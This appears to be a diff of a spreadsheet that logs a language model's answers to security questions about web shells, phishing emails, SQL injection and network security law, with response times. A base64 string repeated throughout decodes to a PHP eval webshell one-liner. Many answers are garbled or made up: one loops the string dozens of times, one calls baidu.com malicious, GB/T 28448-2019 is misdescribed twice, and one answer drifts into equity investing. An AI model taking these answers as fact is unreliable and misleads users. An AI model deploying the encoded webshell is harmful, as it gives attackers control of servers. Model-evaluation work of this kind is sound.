 PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
- 它可能是一个恶意的 base64 编码的内容，但是我们无法确定它的具体含义或是否有危险。
-base64 编码是一种将 binary 数据转换为字符串的方式，它可以将数据编码为字符串，以便在不同的平台上进行交互。但是，如果你接受了一个不知道的 base64 编码的内容，那么它可能会承担一些风险。
-为了防止风险，建议你从可靠的来源接受 base64 编码的内容，并且确保你的系统和软件有正确的安全措施。如果你不知道这段 base64 编码的内容的来源，那么可能最好是不要接受它。
-总之，如果你不知道这段 base64 编码的内容的来源，那么它可能是一个危险的内容，建议你避免接受它。如果你知道的话，那么可以尝试解决它。&lt;/s&gt;</t>
+这个base64编码的内容是一个字符串，可以解码为一个raw字节数组。base64编码的方式是将字节数组转换为 Base64 编码的字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个raw字节数组，可以用Base64解码器解码，得到一个字符串。
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个字符串，可以用Base64编码的方式将其转换为一个raw字节数组，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个raw字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个字符串，可以用Base64编码的方式将其转换为一个raw字节数组，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个raw字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个字符串，可以用Base64编码的方式将其转换为一个raw字节数组，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个raw字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个字符串，可以用Base64编码的方式将其转换为一个raw字节数组，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个raw字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个字符串，可以用Base64编码的方式将其转换为一个raw字节数组，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64解码器解码，得到一个raw字节数组。
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容是一个raw字节数组，可以用Base64编码的方式将其转换为一个字符串，例如：
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+这个base64编码的内容可以用Base64编码的</t>
         </is>
       </c>
       <c r="D71" t="n">
-        <v>10.33848667144775</v>
+        <v>51.6247398853302</v>
       </c>
     </row>
     <row r="72">
@@ -2432,17 +2542,14 @@
       </c>
       <c r="C72" t="inlineStr">
         <is>
-          <t>这是一个钓鱼邮件，它包含一些很有趣的文本和HTML元素，可以用于吸引钓鱼者。这里有一些特点值注意：
-1. 邮件标题：这个邮件标题非常简洁，但它的语言非常友好，可以吸引钓鱼者关注。
-2. 团队成员：这个邮件包含一些团队成员的信息，可以帮助钓鱼者了解这个团队的背景和人才底resh。
-3. 链接：这个邮件包含一个链接，可以帮助钓鱼者了解更多信息。
-4. 异常的HTML元素：这个邮件中的HTML元素非常具有创意，包括文本、表格、图片和链接。
-5. 邮件结束：这个邮件结束了与钓鱼者的进程，并提供了一些链接，可以帮助钓鱼者了解更多信息。
-总的来说，这个钓鱼邮件非常有趣，可以帮助钓鱼者了解更多关于这个团队的信息，并且可以吸引钓鱼者的注意力。&lt;/s&gt;</t>
+          <t>```
+这是一个钓鱼邮件，它包含了一个钓鱼链接，用于让用户跳转到钓鱼平台上进行钓鱼活动。在这个例子中，钓鱼链接是一个 href 属性的 attribute，它将在邮件中打开一个新标签页面，并将用户跳转到钓鱼平台上。
+钓鱼邮件通常包含一个钓鱼链接，以及一些关于钓鱼活动的信息，例如时间、地点、规则等。邮件通常会具有一定的优先级和推荐性，以便在用户收到邮件时能够快速地了解关于钓鱼活动的信息。
+需要注意的是，钓鱼邮件不是一种正式的通信方式，它通常是为了促进用户的参与和互动而发送的。因此，钓鱼邮件的內容通常比较简单和易懂，并且不会包含很多的信息或指导。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D72" t="n">
-        <v>11.01055335998535</v>
+        <v>9.609286785125732</v>
       </c>
     </row>
     <row r="73">
@@ -2465,14 +2572,14 @@
       </c>
       <c r="C73" t="inlineStr">
         <is>
-          <t>这是一个钓鱼邮件，由于邮件中提到了钓鱼防护软件，因此被分类为钓鱼邮件。
-钓鱼邮件通常包含一些特定的字符串或链接，以便在用户点击链接时诱惑他们提供钓鱼软件。这些链接可能会被植入了钓鱼软件，以便在用户点击后下载和安装软件。
-这个邮件中提到的链接为“&lt;a href="https://www.baidu.com/"&gt;192.168.100.100/edr.zip&lt;/a&gt;”，这可能是一个域名或IP地址，但它并不是一个有效的链接。这种域名或IP地址可能是一个恶意的链接，可能会攻击用户的计算机或骗取他们提供钓鱼软件。
-因此，当接收到类似的钓鱼邮件时，建议不要点击任何链接，而是直接忽略或 Delete 这个邮件。如果您需要下载钓鱼防护软件，可以寻找来自可靠源的软件，例如来自官方的安全软件网站或来自知名的安全软件公司。&lt;/s&gt;</t>
+          <t>这是一封钓鱼邮件，其中包含了一个链接，该链接将跳转到一个恶意的网站（baidu.com）。这是一种常见的钓鱼攻击方式，可以使用这个链接来攻击用户的安全。
+这封邮件的主要目标是诱惑用户点击链接，从而安装恶意软件或提供敏感数据。为了避免这种攻击，建议用户仔细检查邮件中的链接，不要点击任何可能不安全的链接。
+另外，这封邮件还包含了一些可信worth信息，例如“最近员工反映多次收到钓鱼邮件”，以便使用户更好地识别这封邮件的恶意。
+总之，不要随意点击邮件中的链接，慎用安全软件，保护自己的计算设备和个人隐私。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D73" t="n">
-        <v>11.64256477355957</v>
+        <v>8.742122650146484</v>
       </c>
     </row>
     <row r="74">
@@ -2495,18 +2602,17 @@
       </c>
       <c r="C74" t="inlineStr">
         <is>
-          <t>This is a web shell, written in JavaScript, which can be embedded in a website to gain unauthorized access to a target system. The script is designed to decode and execute shellcode, which is a piece of machine code that can be used to execute arbitrary system commands.
-Here's how the script works:
-1. The script begins by declaring a function named `fun` that takes a string argument `Str`.
-2. The function decodes the string `Str` using the `Split` function, which splits the string into an array of substrings separated by the delimiter `%`.
-3. The function then loops through each substring in the array using a `For` loop, and for each substring, it appends the ASCII code of the character at that position in the substring to the `fun` variable using the `Chr` function.
-4. The function then ends with the `End Function` statement.
-The reason this script is considered a web shell is that it can be embedded in a website and executed by a visitor's browser, without their knowledge or consent. The script can then use the visitor's machine to gain unauthorized access to a target system, potentially leading to a security breach.
-It's important to note that this script is just an example, and it's not intended to be used in any malicious or illegal activity. However, it does demonstrate how a simple web page can be used to gain unauthorized access to a target system, and why web security is so important.&lt;/s&gt;</t>
+          <t>--%&gt;
+This is a web shell, yes. It takes a string as input and then splits it into an array of characters using the "%" character as a delimiter. It then loops through each character in the array and concatenates it with the "fun" function, which is a simple shell command interpreter.
+The "fun" function takes a single argument, which is the input string, and splits it into an array of characters using the same "%" character as a delimiter. It then loops through each character in the array and converts it to a shell command using the ASCII code of the character.
+For example, if the input string is "hello world", the output of the script would be a series of shell commands, each one representing a character in the input string. So the output might look something like this:
+`hello`
+`world`
+This script is a simple example of how a web shell can be used to execute shell commands on a remote server. More sophisticated web shells may have additional features, such as the ability to execute arbitrary shell commands, manage file system permissions, or even interact with a remote shell session.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D74" t="n">
-        <v>8.160077571868896</v>
+        <v>5.811787366867065</v>
       </c>
     </row>
     <row r="75">
@@ -2558,16 +2664,13 @@
       </c>
       <c r="C75" t="inlineStr">
         <is>
-          <t>&lt;/%&gt;
-```
-这是一个简单的WebShell，它使用了`ProcessBuilder`类创建一个进程，并通过读取进程输入流来获取用户输入。在这个例子中，用户可以输入一个命令，并在响应中看到命令执行结果。
-在这个例子中，我们使用了一个`ProcessBuilder`对象来创建一个进程，并将用户输入作为命令传递给它。然后，我们使用了一个`Scanner`对象来读取进程输入流，并将结果显示在屏幕上。
-这个WebShell可以用于执行一些简单的命令，但它并不安全。在实际使用中，您应该使用更加安全的方式来处理用户输入，例如使用`HttpServletRequest`和`HttpServletResponse`对象来处理Form表单提交，并使用安全的方式来防止XSS攻击。
-在大多数情况下，您不应该使用WebShell来执行命令，因为它可能会对您的网站造成安全风险。如果您需要实现一个简单的命令行Shell，可以考虑使用一个简单的Java服务，例如`java.lang.ProcessBuilder`或`org.jline.terminal.Terminal`。&lt;/s&gt;</t>
+          <t>```
+This is a simple webshell that takes a query parameter from the user and executes a command on the local machine, depending on the operating system. The query parameter is passed to the `ProcessBuilder` class to create a new process, and the output of the command is captured and displayed in the page.
+Note that this is just a simple example and should not be used for any malicious or unauthorized purposes. It is important to always use the internet and computing resources responsibly and ethically.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D75" t="n">
-        <v>9.891859769821167</v>
+        <v>2.7635657787323</v>
       </c>
     </row>
     <row r="76">
@@ -2585,16 +2688,14 @@
       </c>
       <c r="C76" t="inlineStr">
         <is>
-          <t>这是一个简单的Web Shell，它可以在浏览器中打开。如果您是一个恶意个人，您可以使用这个Web Shell来执行任何操作在您的服务器上。
-我们可以通过分析代码来发现它可以perform以下操作：
-1. 获取 $_REQUEST 参数：这是一个可读取的$_REQUEST 参数，包含了用户输入的值。
-2. 使用 array_udiff_assoc() 函数：这个函数用于比较一个数组和另一个数组，并返回差异。在这个例子中，它用于比较 $_REQUEST 参数和一个固定的数组。
-3. 使用 assert() 函数：这个函数用于检查一个值是否等于另一个值。如果您在URL中输入了一个不符合预期的值，这个函数就会执行一个异常处理程序。
-总之，这个Web Shell可以用于执行任何操作在服务器上，只要您输入了一个合法的URL。如果您不想让您的服务器遭受攻击，请勿使用这个Web Shell。&lt;/s&gt;</t>
+          <t>```
+This is a web shell. The code above is a backdoor created by an attacker to gain unauthorized access to a web server. The `array_udiff_assoc()` function is a PHP function that is used to search for specific values in an array, but it is used here to search for the password "LandGrey" in the `$_REQUEST` array.
+If the password is found, the `assert` function is executed, which allows the attacker to gain control of the server and execute arbitrary code. The `array_udiff_assoc()` function is a powerful tool for finding specific values in an array, but it can also be used to create backdoors like this one.
+It is important to note that this is just an example, and the actual code used by an attacker may be more sophisticated and difficult to detect. Regularly updating and testing your web applications, as well as using security measures such as input validation and encryption, can help prevent these types of attacks.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D76" t="n">
-        <v>9.789537668228149</v>
+        <v>5.132488250732422</v>
       </c>
     </row>
     <row r="77">
@@ -2618,20 +2719,27 @@
       </c>
       <c r="C77" t="inlineStr">
         <is>
-          <t>这是一个 SQL 注入攻击，可以通过模拟用户 Input 的方式进行攻击。在这个攻击中，攻击者可以在用户 Input 中添加一个特定的操作符，例如 ' OR 1=1'，从而触发 SQL 语句的执行。
-防范 SQL 注入攻击的方法有以下几点：
-1. 使用 parameterized queries：使用 prepared statements 可以避免 direct SQL injection，因为 parameterized queries 将 Input  Parameter 进行编码，防止攻击者 inject 特定的操作符。
-2. 使用 input validation：在接受用户 Input 时， Validate 用户 Input 的长度、 format 等，防止攻击者 Input 中添加不合法的操作符。
-3. 使用 whitelist：限制只允许合法的操作符，防止攻击者 inject 不合法的操作符。
-4. 使用 limit query scope：限制query scope 的扩展，防止攻击者 inject 敏感数据。
-5. 使用 Encoding 防范：使用utf8 编码可以防止攻击者 inject 特定的操作符。
-6. 使用 Firewall 防范：使用 Firewall 可以防止攻击者 direct attack 到 Database 。
-7. 使用 Log 防范：记录用户 Input 的执行，可以检测到攻击。
-总之，防范 SQL 注入攻击需要采取多个措施，包括使用 parameterized queries、input validation、whitelist、limit query scope、Encoding 防范、Firewall 防范和Log 防范等。&lt;/s&gt;</t>
+          <t>This is an example of a SQL injection attack, and it can be prevented by using parameterized queries and prepared statements.
+Here is a breakdown of the attack:
+* The attacker is using a crafted HTTP request to inject malicious SQL code into the application's database queries.
+* The attacker is exploiting a vulnerability in the application's input validation and sanitation mechanisms, which are not properly validating or sanitizing user input.
+* The attacker is using the `user()` function to inject a malicious `SELECT` statement that queries the database for sensitive information, such as user passwords.
+* The attacker is also using the `power()` function to inject a malicious `UPDATE` statement that updates the application's database with arbitrary data.
+To prevent this type of attack, the application should use parameterized queries and prepared statements, which will properly validate and sanitize user input. This will ensure that malicious SQL code is not injected into the application's database queries, and the attacker will not be able to execute arbitrary SQL code or retrieve sensitive information from the database.
+Here is an example of how the application can use parameterized queries and prepared statements to prevent this type of attack:
+```
+$stmt = $mysqli-&gt;prepare("SELECT * FROM users WHERE user_name = ?");
+$stmt-&gt;bind_param("s", $username);
+$stmt-&gt;execute();
+$result = $stmt-&gt;get_result();
+```
+In this example, the `bind_param()` method is used to bind the `$username` variable to the `user_name` column in the `users` table. This will properly validate and sanitize the `$username` variable, and prevent any malicious SQL code from being injected into the query.
+Additionally, the application should validate and sanitize all user input, and use whitelisting to prevent unknown or unexpected input.
+It's also important to keep in mind that this is just an example of a SQL injection attack, and there are many other types of attacks that can be prevented by using parameterized queries and prepared statements.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D77" t="n">
-        <v>14.17463350296021</v>
+        <v>11.36211824417114</v>
       </c>
     </row>
     <row r="78">
@@ -2645,21 +2753,24 @@
       </c>
       <c r="C78" t="inlineStr">
         <is>
-          <t>律
-网络安全法律是指适用于互联网和网络安全的法律、规则、约束和措施。这些法律、规则和措施的目的是保护互联网用户的隐私、安全和权益，并推动网络安全和稳定的发展。
-网络安全法律的主要内容包括以下几个方面：
-1. 个人隐私保护：禁止网络企业和个人收集、使用、处理个人隐私信息 без consent。
-2. 网络安全措施：规定网络企业应该实施安全措施，如加密、检查、签名等，以防止网络攻击和数据泄露。
-3. 网络违法行为禁止：禁止网络企业和用户进行违法的活动，如违反版权法、谋恶法、淫秽法等。
-4. 网络信息管理：规定网络企业和用户应该管理和维护网络信息的准确、完整和可靠性。
-5. 网络安全响应能力：规定网络企业应该具备可靠的网络安全响应能力，能够快速地采取措施应对网络安全问题。
-6. 网络安全评估和评定：规定网络企业应该进行网络安全评估和评定，评估网络安全状况和风险，并对不符合要求进行纠正和惩罚。
-7. 网络安全教育和适应：规定网络企业应该对用户进行网络安全教育和适应，教育用户如何安全地使用互联网和网络服务。
-总之，网络安全法律的目的是保护互联网用户的隐私、安全和权益，并推动网络安全和稳定的发展。&lt;/s&gt;</t>
+          <t>规？
+Network security regulations are rules and guidelines that organizations must follow to protect their computer networks and data from unauthorized access, use, disclosure, disruption, modification, or destruction. These regulations are designed to ensure the confidentiality, integrity, and availability of an organization's network and data.
+Some common network security regulations include:
+1. Data encryption: Encrypting data in transit and at rest to protect it from unauthorized access.
+2. Firewall configuration: Configuring firewalls to allow only authorized traffic to and from the network.
+3. Access control: Implementing access controls, such as usernames and passwords, to restrict access to the network and data.
+4. Incident response: Developing an incident response plan to handle security incidents, such as hacking attempts or data breaches.
+5. Network segmentation: Segmenting the network into smaller segments to reduce the attack surface and limit the spread of malware.
+6. Secure protocols: Using secure communication protocols, such as HTTPS or SFTP, to protect data in transit.
+7. Regular updates and patches: Keeping software and systems up to date with the latest security patches and updates.
+8. Network monitoring: Monitoring the network for unusual activity and implementing intrusion detection and prevention systems.
+9. Employee education: Educating employees on security best practices and the importance of network security.
+10. Compliance: Ensuring compliance with relevant laws and regulations, such as HIPAA or PCI DSS, that govern network security in specific industries.
+These regulations are important because they help organizations protect their networks and data from cyber threats, which can result in significant financial loss, reputational damage, and legal liability.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D78" t="n">
-        <v>19.79281497001648</v>
+        <v>10.28771305084229</v>
       </c>
     </row>
     <row r="79">
@@ -2673,36 +2784,36 @@
       </c>
       <c r="C79" t="inlineStr">
         <is>
-          <t>律与证明
-INTRODUCTION
-As the world becomes increasingly connected through the internet, the need for network security has grown exponentially. With the rise of cyber attacks, data breaches, and other security threats, it is essential to have a comprehensive understanding of network security laws and regulations. In this blog post, we will provide an overview of network security laws and regulations, as well as the importance of proof in these legal frameworks.
-NETWORK SECURITY LAWS AND REGULATIONS
-Network security laws and regulations are designed to protect the confidentiality, integrity, and availability of data stored or transmitted over networks. These laws and regulations cover a wide range of topics, including:
-1. Data privacy: Laws that regulate the collection, use, and protection of personal data.
-2. Data security: Laws that require organizations to implement appropriate security measures to protect data from unauthorized access, disclosure, or use.
-3. Network infrastructure security: Laws that regulate the security of network infrastructure, including firewalls, routers, and switches.
-4. Incident response: Laws that require organizations to have incident response plans in place to respond to security incidents.
-5. Compliance and enforcement: Laws that establish the responsibilities of organizations and individuals for compliance with network security laws and regulations.
-IMPORTANCE OF PROOF IN NETWORK SECURITY LAWS AND REGULATIONS
-Proof is essential in network security laws and regulations to ensure that organizations can demonstrate compliance with legal requirements. Proof can take many forms, including:
-1. Documentation: Organizations must maintain records of their security measures, including policies, procedures, and incident response plans.
-2. Audits: Organizations must undergo regular security audits to demonstrate compliance with legal requirements.
-3. Logging and monitoring: Organizations must implement logging and monitoring mechanisms to detect and respond to security incidents.
-4. Incident response plans: Organizations must have incident response plans in place to respond to security incidents.
-5. Training and awareness: Organizations must provide training and awareness programs for employees to educate them on network security laws and regulations.
-BENEFITS OF NETWORK SECURITY LAWS AND REGULATIONS
-Network security laws and regulations provide several benefits, including:
-1. Protection of personal data: Network security laws and regulations help protect personal data from unauthorized access, disclosure, or use.
-2. Protection of sensitive information: Network security laws and regulations help protect sensitive information, such as financial information, from unauthorized access or disclosure.
-3. Increased trust: Network security laws and regulations help increase trust between organizations and their customers, partners, and stakeholders.
-4. Reduced risk: Network security laws and regulations help reduce the risk of security incidents, which can result in financial losses, reputational damage, and legal liability.
-5. Compliance with legal and regulatory requirements: Network security laws and regulations help organizations comply with legal and regulatory requirements, reducing the risk of legal penalties and fines.
-CONCLUSION
-Network security laws and regulations are essential for protecting the confidentiality, integrity, and availability of data stored or transmitted over networks. Proof is crucial in these legal frameworks to demonstrate compliance with legal requirements. By understanding network security laws and regulations and implementing appropriate security measures, organizations can reduce the risk of security incidents and increase trust between themselves and their stakeholders.&lt;/s&gt;</t>
+          <t>例？
+Introduction:
+As the internet becomes an increasingly important part of our daily lives, the need for internet security has grown significantly. Internet security refers to the practices and measures taken to protect internet-based systems and networks from various types of threats, including hacking, cybercrime, and cyberterrorism. In this article, we will provide an overview of internet security laws and regulations in different countries, highlighting their similarities and differences.
+ similarities and differences:
+1. Data Protection Act (DPA):
+The Data Protection Act (DPA) is a comprehensive law that regulates the use of personal data in the European Union (EU). The DPA sets out guidelines for organizations to ensure the protection of personal data, including data protection principles, data subject rights, and obligations for organizations handling personal data. The DPA also imposes significant fines on organizations that violate the law.
+2. General Data Protection Regulation (GDPR):
+The General Data Protection Regulation (GDPR) is a comprehensive law that regulates the use of personal data in the EU. The GDPR replaces the DPA and provides more comprehensive protection for individuals' personal data. The GDPR sets out guidelines for organizations to ensure the protection of personal data, including data protection principles, data subject rights, and obligations for organizations handling personal data. The GDPR also imposes significant fines on organizations that violate the law.
+3. California Consumer Privacy Act (CCPA):
+The California Consumer Privacy Act (CCPA) is a comprehensive law that regulates the use of personal data in California, USA. The CCPA sets out guidelines for organizations to ensure the protection of personal data, including data protection principles, data subject rights, and obligations for organizations handling personal data. The CCPA also imposes significant fines on organizations that violate the law.
+4. Personal Information Protection and Electronic Documents Act (PIPEDA):
+The Personal Information Protection and Electronic Documents Act (PIPEDA) is a comprehensive law that regulates the use of personal data in Canada. The PIPEDA sets out guidelines for organizations to ensure the protection of personal data, including data protection principles, data subject rights, and obligations for organizations handling personal data. The PIPEDA also imposes significant fines on organizations that violate the law.
+5. Privacy Act of 1974:
+The Privacy Act of 1974 is a federal law in the United States that regulates the collection, use, and disclosure of personal information by federal agencies. The Privacy Act sets out guidelines for federal agencies to ensure the protection of personal information, including data protection principles, data subject rights, and obligations for federal agencies handling personal information.
+6. Children's Online Privacy Protection Act (COPPA):
+The Children's Online Privacy Protection Act (COPPA) is a comprehensive law that regulates the collection, use, and disclosure of personal information from children under the age of 13 in the United States. COPPA sets out guidelines for websites and online services to ensure the protection of children's personal information, including data protection principles, data subject rights, and obligations for websites and online services handling children's personal information.
+7. Health Insurance Portability and Accountability Act (HIPAA):
+The Health Insurance Portability and Accountability Act (HIPAA) is a comprehensive law that regulates the use and disclosure of protected health information (PHI) in the United States. HIPAA sets out guidelines for healthcare providers, health plans, and other covered entities to ensure the protection of PHI, including data protection principles, data subject rights, and obligations for covered entities handling PHI.
+8. Payment Card Industry Data Security Standard (PCI DSS):
+The Payment Card Industry Data Security Standard (PCI DSS) is a comprehensive law that regulates the security of payment card information in the United States and other countries. PCI DSS sets out guidelines for organizations that handle payment card information to ensure the protection of payment card information, including data protection principles, data subject rights, and obligations for organizations handling payment card information.
+9. Sarbanes-Oxley Act (SOX):
+The Sarbanes-Oxley Act (SOX) is a comprehensive law that regulates the protection of financial information in the United States. SOX sets out guidelines for organizations to ensure the accuracy and reliability of financial information, including data protection principles, data subject rights, and obligations for organizations handling financial information.
+10. Gramm-Leach-Bliley Act (GLBA):
+The Gramm-Leach-Bliley Act (GLBA) is a comprehensive law that regulates the use and disclosure of financial information in the United States. GLBA sets out guidelines for financial institutions to ensure the protection of financial information, including data protection principles, data subject rights, and obligations for financial institutions handling financial information.
+Conclusion:
+Internet security laws and regulations vary across different countries and regions, but there are some similarities and differences between them. Understanding these similarities and differences is essential for organizations to ensure compliance with internet security laws and regulations. By implementing robust security measures and practices, organizations can protect their customers' personal data and maintain their trust.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D79" t="n">
-        <v>20.94087934494019</v>
+        <v>31.57428932189941</v>
       </c>
     </row>
     <row r="80">
@@ -2716,19 +2827,24 @@
       </c>
       <c r="C80" t="inlineStr">
         <is>
-          <t>——热储能规范
-GB/T 28448-2019《热储能规范》是中国标准化管理机构中国标准技术服务中心编辑的一篇标准文档，于2019年7月1日公布。本标准详细规定了热储能技术的设计、施工、监理和测试等过程，以保证热储能设备的安全、可靠和绿色。
-本标规主要涵盖了以下几个方面：
-1. 热储能技术基础理论：详细介绍热储能技术的基础理论，包括热能学、热传导、热辐射、热动力学、热保护等方面的基本原理和应用。
-2. 热储能设备设计规范：详细规定热储能设备的设计要求，包括设备结构、材料选择、温度、压力、液体流速等参数的规定。
-3. 热储能施工规范：详细规定热储能施工的要求和程序，包括施工地点、施工顺序、施工技术、施工人员资格等方面的规定。
-4. 热储能监理规范：详细规定热储能监理的要求和程序，包括监理对象、监理领域、监理技术、监理人员资格等方面的规定。
-5. 热储能测试规范：详细规定热储能测试的要求和程序，包括测试对象、测试顺序、测试技术、测试人员资格等方面的规定。
-总的来说，GB/T 28448-2019《热储能规范》是中国热储能技术的一个重要参考文档，旨在保障热储能设备的安全、可靠和绿色，避免热储能设备的不良事件和环境潜在威胁。&lt;/s&gt;</t>
+          <t>中的针对性安全性评估方法
+GB/T 28448-2019 针对性安全性评估方法是中国 Standards GB/T 28448-2019 的一部分，涵盖了针对性安全性评估的基本原则、方法和评估标准。以下是它中的一些主要内容：
+1. 针对性安全性评价的基本原则：
+	* 针对性安全性评估应基于实际情况进行，包括评估风险、评估威胁、评估影响和评估控制等方面。
+	* 针对性安全性评估应包括针对性评估和非针对性评估。
+	* 针对性安全性评估应考虑相关法律、规定和评估标准。
+2. 针对性安全性评估方法：
+	* 针对性安全性评估应使用可靠的评估方法和技术，包括评估风险、评估威胁、评估影响和评估控制等方面。
+	* 针对性安全性评估应包括针对性评估和非针对性评估。
+	* 针对性安全性评估应考虑相关法律、规定和评估标准。
+3. 针对性安全性评估标准：
+	* 针对性安全性评估应遵循相关标准和规定，包括GB/T 28448-2019、GB/T 28449-2019等。
+	* 针对性安全性评估标准应包括评估风险、评估威胁、评估影响和评估控制等方面。
+总之，GB/T 28448-2019 针对性安全性评估方法和标准提供了详细的评估方法和评估标准，帮助企业和机构进行针对性安全性评估，确保了安全性评估的可靠性和公平性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D80" t="n">
-        <v>21.64286828041077</v>
+        <v>21.82578802108765</v>
       </c>
     </row>
     <row r="81">
@@ -2742,29 +2858,16 @@
       </c>
       <c r="C81" t="inlineStr">
         <is>
-          <t>？
-Evaluation is a process of assessing the quality, value or effectiveness of something, such as a product, service, or program. In the context of education, evaluation is used to assess the quality of educational programs, courses, or materials. The goal of evaluation is to provide feedback on the strengths and weaknesses of an educational program, and to identify areas for improvement.
-There are several types of evaluation methods used in education, including:
-1. Formative evaluation: This type of evaluation is conducted during the development or implementation of a program, and is used to identify areas for improvement.
-2. Summative evaluation: This type of evaluation is conducted after a program has been implemented, and is used to assess its overall effectiveness.
-3. Process evaluation: This type of evaluation is focused on understanding how a program is implemented, and the factors that influence its success.
-4. Impact evaluation: This type of evaluation is used to assess the impact of a program on student learning or other outcomes.
-5. Self-evaluation: This type of evaluation is conducted by the program itself, and is used to assess its own effectiveness and identify areas for improvement.
-6. Peer evaluation: This type of evaluation is conducted by external evaluators who are not directly involved in the program, and is used to assess the program's effectiveness and identify areas for improvement.
-7. Student evaluation: This type of evaluation is conducted by students themselves, and is used to assess the effectiveness of a program from their perspective.
-The advantages of evaluation in education include:
-1. Improved program quality: Evaluation helps to identify areas for improvement, which can lead to higher quality programs.
-2. Increased accountability: Evaluation helps to ensure that programs are accountable for their actions and outcomes.
-3. Better decision-making: Evaluation provides valuable information that can be used to make informed decisions about program development and improvement.
-4. Enhanced student learning: Evaluation can help to identify areas where student learning can be improved, leading to better outcomes.
-5. Increased transparency and trust: Evaluation can help to increase transparency and trust in educational programs by providing information about their effectiveness.
-6. Cost savings: Evaluation can help to identify areas where costs can be reduced, leading to cost savings.
-7. Improved stakeholder engagement: Evaluation can help to increase stakeholder engagement by providing information about the effectiveness of programs and the impact they have on students.
-In conclusion, evaluation is an essential component of educational programs, as it provides valuable information that can be used to improve program quality, accountability, decision-making, student learning, transparency, trust, and cost savings.&lt;/s&gt;</t>
+          <t>Equity-based evaluation is an assessment method that focuses on evaluating the performance of a portfolio or investment strategy based on the value of the underlying equity assets.
+In equity-based evaluation, the performance of the portfolio is measured by tracking the changes in the value of the equity assets held by the portfolio over a specific period of time. This method is commonly used by investment managers and analysts to evaluate the performance of a portfolio relative to a benchmark or to compare the performance of different portfolios.
+Equity-based evaluation takes into account the total return of the equity assets, including both the capital appreciation and the dividend income. The total return is usually expressed as a percentage, and it is calculated by subtracting the initial value of the portfolio from its final value and dividing the result by the initial value.
+Equity-based evaluation is useful for evaluating the performance of a portfolio that holds equity assets, such as stocks or mutual funds. It is particularly useful for evaluating the performance of a portfolio that is focused on long-term growth, as it takes into account the compounding effect of the returns over time.
+However, equity-based evaluation has some limitations. For example, it may not be suitable for evaluating the performance of a portfolio that holds a mix of asset classes, as it only considers the performance of the equity assets. Additionally, equity-based evaluation may not take into account the risk associated with the portfolio, as it only considers the total return without considering the volatility of the returns.
+In conclusion, equity-based evaluation is an assessment method that focuses on evaluating the performance of a portfolio or investment strategy based on the value of the underlying equity assets. It is useful for evaluating the performance of a portfolio that holds equity assets, but it has some limitations that should be considered when evaluating the performance of a portfolio.</t>
         </is>
       </c>
       <c r="D81" t="n">
-        <v>15.4594554901123</v>
+        <v>10.82117247581482</v>
       </c>
     </row>
     <row r="82">
@@ -2776,25 +2879,21 @@
